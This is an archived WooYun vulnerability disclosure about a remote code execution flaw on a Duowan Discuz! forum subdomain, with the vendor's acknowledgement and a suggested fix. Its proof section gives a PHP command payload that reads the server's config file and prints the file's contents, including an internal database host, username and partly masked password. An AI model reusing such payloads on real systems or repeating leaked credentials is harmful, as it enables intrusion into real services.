当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080879

漏洞标题:多玩某分站存在远程代码执行漏洞

相关厂商:广州多玩

漏洞作者: 猪猪侠

提交时间:2014-10-26 17:57

修复时间:2014-12-10 17:58

公开时间:2014-12-10 17:58

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-26: 细节已通知厂商并且等待厂商处理中
2014-10-27: 厂商已经确认,细节仅向厂商公开
2014-11-06: 细节向核心白帽子及相关领域专家公开
2014-11-16: 细节向普通白帽子公开
2014-11-26: 细节向实习白帽子公开
2014-12-10: 细节向公众公开

简要描述:

多玩某分站远程代码执行漏洞

详细说明:

影响网站:
http://yaoguobbs.duowan.com


mask 区域
*****^^^*****
1.http://**.**.**/dzvul/sodb/19/sodb-2010-01.txt


漏洞证明:

cmd.png


cmd=echo readfile('./config.inc.php');

<?php
/*
[Discuz!] (C)2001-2006 Comsenz Inc.
This is NOT a freeware, use is subject to license terms
$RCSfile: config5.inc.php,v $
$Revision: 1.1 $
$Date: 2007/11/10 04:06:46 $
*/
// [CH] 以下变量请根据空间商提供的账号参数修改,如有疑问,请联系服务器提供商
$dbhost = '10.20.**.**:6301'; // 数据库服务器
$dbuser = 'net_wgbbs_rw'; // 数据库用户名
$dbpw = '0Sk*****9ir'; // 数据库密码
$dbname = 'wgbbs'; // 数据库名
$pconnect = 0; // 数据库持久连接 0=关闭, 1=打开
// [CH] 如您对 cookie 作用范围有特殊要求, 或论坛登录不正常, 请修改下面变量, 否则请保持默认
$cookiepre = 'wgbbs_'; // cookie 前缀
$cookiedomain = 'duowan.com'; // cookie 作用域
$cookiepath = '/'; // cookie 作用路径
// [CH] 论坛投入使用后不能修改的变量
$tablepre = 'club_'; // 表名前缀, 同一数据库安装多个论坛请修改此处
// [CH] 小心修改以下变量, 否则可能导致论坛无法正常使用
$database = 'mysql'; // 论坛数据库类型,请勿修改
$dbcharset = ''; // MySQL 字符集, 可选 'gbk', 'big5', 'utf8', 'latin1', 留空为按照论坛字符集设定
$charset = 'utf-8'; // 论坛页面默认字符集, 可选 'gbk', 'big5', 'utf-8'
$headercharset = 0; // 强制论坛页面使用默认字符集,可避免部分服务器空间页面出现乱码,一般无需开启。 0=关闭 1= 开启
$tplrefresh = 1; // 论坛风格模板自动刷新开关 0=关闭, 1=打开。
// [CH] 论坛安全设置, 调整以下设置,可以增强论坛的安全性能和防御性能
$adminemail = '[email protected]'; // 系统管理员 Email

修复方案:

更改php.ini
设置: request_order为GPC

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-10-27 21:49

厂商回复:

感谢对于欢聚时代安全工作的支持,我们会尽快修复

最新状态:

暂无